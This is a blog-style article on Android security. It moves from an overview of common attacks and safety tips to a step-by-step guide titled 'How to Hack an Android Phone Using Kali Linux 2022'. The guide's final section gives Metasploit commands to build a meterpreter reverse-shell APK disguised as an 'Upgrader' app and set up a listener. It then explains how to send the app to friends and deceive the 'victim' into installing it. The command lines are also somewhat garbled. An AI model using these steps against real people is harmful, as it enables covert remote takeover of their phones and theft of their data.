There is a significant difference between hackers and attackers. Hackers prefer to play with computer systems to get them to perform things that were not intended. In contrast, attackers are criminals who take advantage of security flaws in computer systems to access data or processes.
In this article, we will discuss how to hack an android phone using Kali Linux 2022.
Android has experienced a meteoric rise in popularity since its 2008 introduction, and it is currently, by far, the most popular mobile operating system.
Android’s success is partly due to its being made available as open source software, giving application developers far better access to its internal workings. Android is available on various hardware due to the extensive library of apps and extensions.
Android has become so popular that it already accounts for more than 80% of the market for mobile operating systems. Statista predicts that that percentage will reach nearly 90% by 2022.
Hackers are attracted to Android because of its accessibility and appeal to mobile developers. It is simple to hack into because of the open platform. Of course, even though most hackers just love messing with hardware and software, there will always be attackers looking to take advantage of weaknesses.
The Three Most Dangerous Attacks on Android Devices
Initial Attack: Data in Transit
Man-in-the-middle attacks and other hacking techniques that target unsecured communications over public Wi-Fi networks and other wireless communication systems are commonplace on mobile devices, particularly those running the Android operating system. Attackers can pose as genuine web services, steal data, or intercept calls and text messages by blocking a user’s signal.
Second Attack: Doubtful App Stores
Due to a lack of security procedures, unreliable app stores might be a hassle. Ensure the app store you like for Android apps implements sufficient security measures and has a robust security plan. Due to a lack of fundamental security protections, sideloading, in which you install apps without using an app store—is also a process to handle carefully.
Third Attack: SMS Trojans
SMS trojans, which seem like hacked apps, can occasionally be found in malicious apps. This app gains access to a mobile device’s calling and text messaging features, enabling it to carry out tasks like sending text messages containing malicious URLs to everyone in a user’s contact book. Attackers can then use these connections to spread computer viruses and other harmful messages to payment-based services, costing the user money and generating revenue for scammers.
How to Prevent Attackers From Using Your Android Device
Although most users of these hacking tools have no hatred in their hearts, they can also be employed by attackers to discover and take advantage of security holes in Android software.
Developers and businesses can use a secure software development lifecycle to reduce their exposure to exploits that could result in the disclosure of their client’s confidential information or the theft or threat of their financial assets.
Three Ways to Keep Your Android Devices Safe
Enable TLS encryption
According to OWASP, many different applications have a serious problem with insufficient encryption. You may safely generate and exchange session keys by encrypting internet traffic using Transport Layer Security (TLS). This defends against the majority of network eavesdropping and man-in-the-middle attacks.
Security Check for Third-Party Apps
Use only apps from the official Google Play store to stay safe from fraudulent apps. Google Play employs far better security measures than third-party websites, some of which could host hundreds of thousands of dangerous apps. Check the app’s permissions before installation if you absolutely must download it from a third-party store. Keep an eye out for apps that ask for your identity or the ability to send messages to your contacts without your approval.
When Using SMS Payments, Tread Cautiously
Limit the ability of your Android phone’s apps to spend your money automatically. If possible, avoid apps that request cash by SMS because this is a warning sign.
How to Hack an Android Phone Using Kali Linux 2022
The steps for how to hack an Android phone using Kali Linux 2022 are described below.
1: Launch Kali
- Launch a terminal and create a Trojan.apk file.
Msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4
R > /root/Upgrader.apk (replace LHOST with your own IP)
- By using your public/external IP in the LHOST and port forwarding, you can also hack an Android device over a wide area network or the Internet (ask me about port forwarding if you have problems in the comment section)
2: Open a Different Terminal
- Open a different terminal and wait for the file to generate itself.
- Type msfconsole to launch the Metasploit console.
3: Set a Listener
- It will take some time to load. Once it has, loads the multi-handler exploit by typing: use exploit/multi/handler.
- To Set up a (reverse) payload, type: set payload android/meterpreter/reverse_tcp
- To set L host type: set LHOST 192.168.0.4 (Even if you are hacking on WAN, type your private/internal IP here, not the public/external)
- To start the listener, type: exploit at last.
- Copy Upgrader.apk, the application you created, from the root folder to your Android device.
- Then send it by adding it to Dropbox or another sharing platform.
- Then, share the website’s link with your friends to take advantage of their phones (Only on LAN, but if you used the WAN method, you could use the exploit anywhere on the INTERNET).
- Allow the victim to install the Upgrader app (as he would believe it will upgrade certain features on his phone).
- If this option is disabled, the android phone’s security settings should be changed to enable it so the Trojan can be installed.
- And when he clicks Open, the meterpreter prompt appears.
In the above article, we have discussed what android hacking is, what can be dangerous attacks on android devices, how to keep your android phone safe, and how to hack an android phone using Kali Linux 2022.